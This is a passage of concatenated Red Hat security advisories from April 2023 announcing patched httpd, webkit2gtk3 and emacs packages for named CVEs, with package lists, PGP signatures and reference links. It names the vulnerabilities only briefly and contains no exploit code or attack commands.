webkit2gtk3-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-devel-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.3.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-28205  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEGgpdzjgjWX9erEAQgUjA/9GvTg0OjMXhVUv5AF6hVj25NeVl1lrejR  
Zwzd/dvchjpT8bqLZhAKQs3REFtO9vVRcEt6OWEhcDY24iwE9Icpsg4gNsypZPOr  
e/o1WKNkDlyprHKtR0wQWuIqNnvIlYDChBpJIStS+nQix7Re9AKnBzXG0SNJsZP+  
0+3UV8OtGvJAmWJfpOH52JoSqAp9y8+eKxRkcHWhe843o+EiIwZR8GD5sedElw0b  
Oalmfse5clwSa5syXcr6yWVfrYBusxT3XIcSnEvu6QV8kuJJbwiWbdM+1ydLuYxg  
0OmarVvHTWMT+LVQr0glvADQaN1oZBKVg5OVRSc0ZnG+hvwnq/cK4GsBfFvegY2b  
UPyFnmJphETdVp9bNCtFBU3rtaVLjcWh0Y5PBRymIlxgDmji04IsJgK0HGwwrS8M  
jxKkw03g16DKWg7lleO76jlr30vsGXzqMKMSqjSNLhUKu6FbFdR/pJcXLaALzEXA  
S/AqUzJFuJp3cL1x6OBjFVwr38E9ElkQC9MSKV0JeoeOPCgY1Lew0JjoUAjcLR+M  
V17lpBY6b+E5kASDMWApUqunkjWsDg8abyFSyHeoMaxLx5QhIWmJuHLe0rtWfuEM  
zKO63TQXfVuqKma3yfWuwee5RqUpo5GplwWXH35qbJhUh8V63liXtXrTsu2F8uxx  
Lr20GwzdjN0=  
=wPFl  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1919-01

Red Hat Security Advisory 2023-1916-01 - The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: httpd and mod_http2 security update  
Advisory ID:       RHSA-2023:1916-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1916  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-25690   
=====================================================================

1. Summary:

An update for httpd and mod_http2 is now available for Red Hat Enterprise  
Linux 9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The httpd packages provide the Apache HTTP Server, a powerful, efficient,  
and extensible web server.

Security Fix(es):

* httpd: HTTP request splitting with mod_rewrite and mod_proxy  
(CVE-2023-25690)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, the httpd daemon will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2176209 - CVE-2023-25690 httpd: HTTP request splitting with mod_rewrite and mod_proxy

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
httpd-2.4.51-7.el9_0.4.src.rpm  
mod_http2-1.15.19-3.el9_0.5.src.rpm

aarch64:  
httpd-2.4.51-7.el9_0.4.aarch64.rpm  
httpd-debuginfo-2.4.51-7.el9_0.4.aarch64.rpm  
httpd-debugsource-2.4.51-7.el9_0.4.aarch64.rpm  
httpd-devel-2.4.51-7.el9_0.4.aarch64.rpm  
httpd-tools-2.4.51-7.el9_0.4.aarch64.rpm  
httpd-tools-debuginfo-2.4.51-7.el9_0.4.aarch64.rpm  
mod_http2-1.15.19-3.el9_0.5.aarch64.rpm  
mod_http2-debuginfo-1.15.19-3.el9_0.5.aarch64.rpm  
mod_http2-debugsource-1.15.19-3.el9_0.5.aarch64.rpm  
mod_ldap-2.4.51-7.el9_0.4.aarch64.rpm  
mod_ldap-debuginfo-2.4.51-7.el9_0.4.aarch64.rpm  
mod_lua-2.4.51-7.el9_0.4.aarch64.rpm  
mod_lua-debuginfo-2.4.51-7.el9_0.4.aarch64.rpm  
mod_proxy_html-2.4.51-7.el9_0.4.aarch64.rpm  
mod_proxy_html-debuginfo-2.4.51-7.el9_0.4.aarch64.rpm  
mod_session-2.4.51-7.el9_0.4.aarch64.rpm  
mod_session-debuginfo-2.4.51-7.el9_0.4.aarch64.rpm  
mod_ssl-2.4.51-7.el9_0.4.aarch64.rpm  
mod_ssl-debuginfo-2.4.51-7.el9_0.4.aarch64.rpm

noarch:  
httpd-filesystem-2.4.51-7.el9_0.4.noarch.rpm  
httpd-manual-2.4.51-7.el9_0.4.noarch.rpm

ppc64le:  
httpd-2.4.51-7.el9_0.4.ppc64le.rpm  
httpd-debuginfo-2.4.51-7.el9_0.4.ppc64le.rpm  
httpd-debugsource-2.4.51-7.el9_0.4.ppc64le.rpm  
httpd-devel-2.4.51-7.el9_0.4.ppc64le.rpm  
httpd-tools-2.4.51-7.el9_0.4.ppc64le.rpm  
httpd-tools-debuginfo-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_http2-1.15.19-3.el9_0.5.ppc64le.rpm  
mod_http2-debuginfo-1.15.19-3.el9_0.5.ppc64le.rpm  
mod_http2-debugsource-1.15.19-3.el9_0.5.ppc64le.rpm  
mod_ldap-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_ldap-debuginfo-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_lua-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_lua-debuginfo-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_proxy_html-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_proxy_html-debuginfo-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_session-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_session-debuginfo-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_ssl-2.4.51-7.el9_0.4.ppc64le.rpm  
mod_ssl-debuginfo-2.4.51-7.el9_0.4.ppc64le.rpm

s390x:  
httpd-2.4.51-7.el9_0.4.s390x.rpm  
httpd-debuginfo-2.4.51-7.el9_0.4.s390x.rpm  
httpd-debugsource-2.4.51-7.el9_0.4.s390x.rpm  
httpd-devel-2.4.51-7.el9_0.4.s390x.rpm  
httpd-tools-2.4.51-7.el9_0.4.s390x.rpm  
httpd-tools-debuginfo-2.4.51-7.el9_0.4.s390x.rpm  
mod_http2-1.15.19-3.el9_0.5.s390x.rpm  
mod_http2-debuginfo-1.15.19-3.el9_0.5.s390x.rpm  
mod_http2-debugsource-1.15.19-3.el9_0.5.s390x.rpm  
mod_ldap-2.4.51-7.el9_0.4.s390x.rpm  
mod_ldap-debuginfo-2.4.51-7.el9_0.4.s390x.rpm  
mod_lua-2.4.51-7.el9_0.4.s390x.rpm  
mod_lua-debuginfo-2.4.51-7.el9_0.4.s390x.rpm  
mod_proxy_html-2.4.51-7.el9_0.4.s390x.rpm  
mod_proxy_html-debuginfo-2.4.51-7.el9_0.4.s390x.rpm  
mod_session-2.4.51-7.el9_0.4.s390x.rpm  
mod_session-debuginfo-2.4.51-7.el9_0.4.s390x.rpm  
mod_ssl-2.4.51-7.el9_0.4.s390x.rpm  
mod_ssl-debuginfo-2.4.51-7.el9_0.4.s390x.rpm

x86_64:  
httpd-2.4.51-7.el9_0.4.x86_64.rpm  
httpd-debuginfo-2.4.51-7.el9_0.4.x86_64.rpm  
httpd-debugsource-2.4.51-7.el9_0.4.x86_64.rpm  
httpd-devel-2.4.51-7.el9_0.4.x86_64.rpm  
httpd-tools-2.4.51-7.el9_0.4.x86_64.rpm  
httpd-tools-debuginfo-2.4.51-7.el9_0.4.x86_64.rpm  
mod_http2-1.15.19-3.el9_0.5.x86_64.rpm  
mod_http2-debuginfo-1.15.19-3.el9_0.5.x86_64.rpm  
mod_http2-debugsource-1.15.19-3.el9_0.5.x86_64.rpm  
mod_ldap-2.4.51-7.el9_0.4.x86_64.rpm  
mod_ldap-debuginfo-2.4.51-7.el9_0.4.x86_64.rpm  
mod_lua-2.4.51-7.el9_0.4.x86_64.rpm  
mod_lua-debuginfo-2.4.51-7.el9_0.4.x86_64.rpm  
mod_proxy_html-2.4.51-7.el9_0.4.x86_64.rpm  
mod_proxy_html-debuginfo-2.4.51-7.el9_0.4.x86_64.rpm  
mod_session-2.4.51-7.el9_0.4.x86_64.rpm  
mod_session-debuginfo-2.4.51-7.el9_0.4.x86_64.rpm  
mod_ssl-2.4.51-7.el9_0.4.x86_64.rpm  
mod_ssl-debuginfo-2.4.51-7.el9_0.4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25690  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEGgoNzjgjWX9erEAQhLLg/6Aom/QnxDa3PEpD4Bjil+3AT4x6K6T0/d  
i4qyIgFHUcWTdGVQQU+oEMmMlEi9sJAl9EB8rGYQbPcjquqGWDZn7kbVJGeDaaZQ  
vZF/eQXybuCCc4WBBb9bM0jdWtGh4im7L5+sIO8XPD87yQAbf7R+04PfW5yua0I5  
OkVELzaItgMsi9YBPLmzBDBTxPeSwKK9htWVGL0UhM3225uJCywddjfRL5xwQaLB  
+aLx+A3K2VP4Ve9/frnSKm4omkIkdUE7Nw1kA+2bseCq3OwDF+Fr5/A9RHsiEtfh  
FqPRp/uzUShM0UCzGfy9TATsIQjgGuGGxIFGWrjcYlKKUNJ+7Fs0KWGfZipXc2sv  
TzhPW0UXZx2bJUohBd06yYF4Ghr+z9jKWrhOEad4bsgjPf5fWhdMpxzOBPB9Cz4l  
3UOTxEualVfOjUe2lKPlwYtItfFkY9kvgaQDTgOvbx15DUaw2rIsY6dWRWJsPfJw  
T3F+MKEvEnmbTU+n86d2XR2BP+8vAyDuJuJ+2ZEc1tUhcsXyUuMG8f7VynjP9hHm  
aRTWK2/2ugy8BfJfoUS/9cM3w6GF0zxyCkDme7txbUqUw89LIxhVBum2c3oUfmd6  
ScfHYWRr0R9NxAXzgCjA7sX6HlVZSoIKhWFtegsADAS6yNVb+dBVavbfUYrRgrOE  
iuiNhsEFBV4=  
=Ps2v  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1916-01

Red Hat Security Advisory 2023-1918-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:1918-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1918  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-28205   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* WebKitGTK: use-after-free leads to arbitrary code execution  
(CVE-2023-28205)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2185724 - CVE-2023-28205 WebKitGTK: use-after-free leads to arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
webkit2gtk3-2.36.7-1.el9_1.3.src.rpm

aarch64:  
webkit2gtk3-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3.aarch64.rpm

ppc64le:  
webkit2gtk3-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3.ppc64le.rpm

s390x:  
webkit2gtk3-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3.s390x.rpm

x86_64:  
webkit2gtk3-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-devel-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_1.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-28205  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEGgmdzjgjWX9erEAQi06Q/9GQC0R4zJg84qKELW972t3dpQMX4djnuK  
5TKnsEBPT3PH3R8yRdQTlxdGP9shDJe5OvJROF1olLczpo2kgoaI4tyW+UcRHPvi  
hQkoKv+PbY/pxyZHj+GFo6laoTHsvGp29m5KC6W8djsvxR+Iwdhzaim/WJMl5JvR  
MmmwUOd+An+4zk61wKuT4vEJWh3P+oyieO4bbSIUh5GOYNwuCcgYNtuLcw6ar1AM  
r6INmhZ5AzEJNLiSc0AYjXolDhv+sKQ6aCZ6k4QudlCPCOLvlbIECda70hWP+UbX  
O3dTXjH4bCwiv+OwhMc6fQbAcL1HCuVYbzsvwfSsh/iYTZfn5KgnIjhG3xANnyu9  
izEimPb0sklj0ubdEe/VuqOF4y/pZWkrzoXUnxFg+vVDplGtV94EobL8C/uHwjEI  
lzZahd3DITpDmA2vr6McP+TrZk5QUGvVgubBr6/RSlZOZzy7odifK6R2Nb9KWPHr  
uoYviORBRTKa15d2F86jlrdeWKVFC/uIEw85FBtfN+TiigbtonDp6scmwcznZEU9  
zAkM4hlS6tx5yYjky+RuxkgdFkL7J1q6/PqIJ2+TBVKiU+X78s4W1ITOs/5eBo7T  
uiCac2y7DkqP8vJoAMAmnavi1gOepZ9d/DeBwBY1Fa2pr1cdS8yhy546a51cMhLj  
FVsDcrY98uo=  
=SSir  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1918-01

Red Hat Security Advisory 2023-1915-01 - GNU Emacs is a powerful, customizable, self-documenting text editor. It provides special code editing features, a scripting language, and the capability to read e-mail and news. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: emacs security update  
Advisory ID:       RHSA-2023:1915-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1915  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-28617   
=====================================================================

1. Summary:

An update for emacs is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS AUS (v. 8.2) - noarch  
Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - noarch  
Red Hat Enterprise Linux BaseOS TUS (v. 8.2) - noarch

3. Description:

GNU Emacs is a powerful, customizable, self-documenting text editor. It  
provides special code editing features, a scripting language (elisp), and  
the capability to read e-mail and news.

Security Fix(es):

* emacs: command injection vulnerability in org-mode (CVE-2023-28617)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2180544 - CVE-2023-28617 emacs: command injection vulnerability in org-mode

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

aarch64:  
emacs-26.1-5.el8_2.1.aarch64.rpm  
emacs-common-26.1-5.el8_2.1.aarch64.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-debugsource-26.1-5.el8_2.1.aarch64.rpm  
emacs-lucid-26.1-5.el8_2.1.aarch64.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-nox-26.1-5.el8_2.1.aarch64.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.aarch64.rpm

noarch:  
emacs-terminal-26.1-5.el8_2.1.noarch.rpm

ppc64le:  
emacs-26.1-5.el8_2.1.ppc64le.rpm  
emacs-common-26.1-5.el8_2.1.ppc64le.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-debugsource-26.1-5.el8_2.1.ppc64le.rpm  
emacs-lucid-26.1-5.el8_2.1.ppc64le.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-nox-26.1-5.el8_2.1.ppc64le.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.ppc64le.rpm

s390x:  
emacs-26.1-5.el8_2.1.s390x.rpm  
emacs-common-26.1-5.el8_2.1.s390x.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-debugsource-26.1-5.el8_2.1.s390x.rpm  
emacs-lucid-26.1-5.el8_2.1.s390x.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-nox-26.1-5.el8_2.1.s390x.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.s390x.rpm

x86_64:  
emacs-26.1-5.el8_2.1.x86_64.rpm  
emacs-common-26.1-5.el8_2.1.x86_64.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-debugsource-26.1-5.el8_2.1.x86_64.rpm  
emacs-lucid-26.1-5.el8_2.1.x86_64.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-nox-26.1-5.el8_2.1.x86_64.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

aarch64:  
emacs-26.1-5.el8_2.1.aarch64.rpm  
emacs-common-26.1-5.el8_2.1.aarch64.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-debugsource-26.1-5.el8_2.1.aarch64.rpm  
emacs-lucid-26.1-5.el8_2.1.aarch64.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-nox-26.1-5.el8_2.1.aarch64.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.aarch64.rpm

noarch:  
emacs-terminal-26.1-5.el8_2.1.noarch.rpm

ppc64le:  
emacs-26.1-5.el8_2.1.ppc64le.rpm  
emacs-common-26.1-5.el8_2.1.ppc64le.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-debugsource-26.1-5.el8_2.1.ppc64le.rpm  
emacs-lucid-26.1-5.el8_2.1.ppc64le.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-nox-26.1-5.el8_2.1.ppc64le.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.ppc64le.rpm

s390x:  
emacs-26.1-5.el8_2.1.s390x.rpm  
emacs-common-26.1-5.el8_2.1.s390x.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-debugsource-26.1-5.el8_2.1.s390x.rpm  
emacs-lucid-26.1-5.el8_2.1.s390x.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-nox-26.1-5.el8_2.1.s390x.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.s390x.rpm

x86_64:  
emacs-26.1-5.el8_2.1.x86_64.rpm  
emacs-common-26.1-5.el8_2.1.x86_64.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-debugsource-26.1-5.el8_2.1.x86_64.rpm  
emacs-lucid-26.1-5.el8_2.1.x86_64.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-nox-26.1-5.el8_2.1.x86_64.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

aarch64:  
emacs-26.1-5.el8_2.1.aarch64.rpm  
emacs-common-26.1-5.el8_2.1.aarch64.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-debugsource-26.1-5.el8_2.1.aarch64.rpm  
emacs-lucid-26.1-5.el8_2.1.aarch64.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.aarch64.rpm  
emacs-nox-26.1-5.el8_2.1.aarch64.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.aarch64.rpm

noarch:  
emacs-terminal-26.1-5.el8_2.1.noarch.rpm

ppc64le:  
emacs-26.1-5.el8_2.1.ppc64le.rpm  
emacs-common-26.1-5.el8_2.1.ppc64le.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-debugsource-26.1-5.el8_2.1.ppc64le.rpm  
emacs-lucid-26.1-5.el8_2.1.ppc64le.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.ppc64le.rpm  
emacs-nox-26.1-5.el8_2.1.ppc64le.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.ppc64le.rpm

s390x:  
emacs-26.1-5.el8_2.1.s390x.rpm  
emacs-common-26.1-5.el8_2.1.s390x.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-debugsource-26.1-5.el8_2.1.s390x.rpm  
emacs-lucid-26.1-5.el8_2.1.s390x.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.s390x.rpm  
emacs-nox-26.1-5.el8_2.1.s390x.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.s390x.rpm

x86_64:  
emacs-26.1-5.el8_2.1.x86_64.rpm  
emacs-common-26.1-5.el8_2.1.x86_64.rpm  
emacs-common-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-debugsource-26.1-5.el8_2.1.x86_64.rpm  
emacs-lucid-26.1-5.el8_2.1.x86_64.rpm  
emacs-lucid-debuginfo-26.1-5.el8_2.1.x86_64.rpm  
emacs-nox-26.1-5.el8_2.1.x86_64.rpm  
emacs-nox-debuginfo-26.1-5.el8_2.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS AUS (v. 8.2):

Source:  
emacs-26.1-5.el8_2.1.src.rpm

noarch:  
emacs-filesystem-26.1-5.el8_2.1.noarch.rpm

Red Hat Enterprise Linux BaseOS E4S (v. 8.2):

Source:  
emacs-26.1-5.el8_2.1.src.rpm

noarch:  
emacs-filesystem-26.1-5.el8_2.1.noarch.rpm

Red Hat Enterprise Linux BaseOS TUS (v. 8.2):

Source:  
emacs-26.1-5.el8_2.1.src.rpm

noarch:  
emacs-filesystem-26.1-5.el8_2.1.noarch.rpm

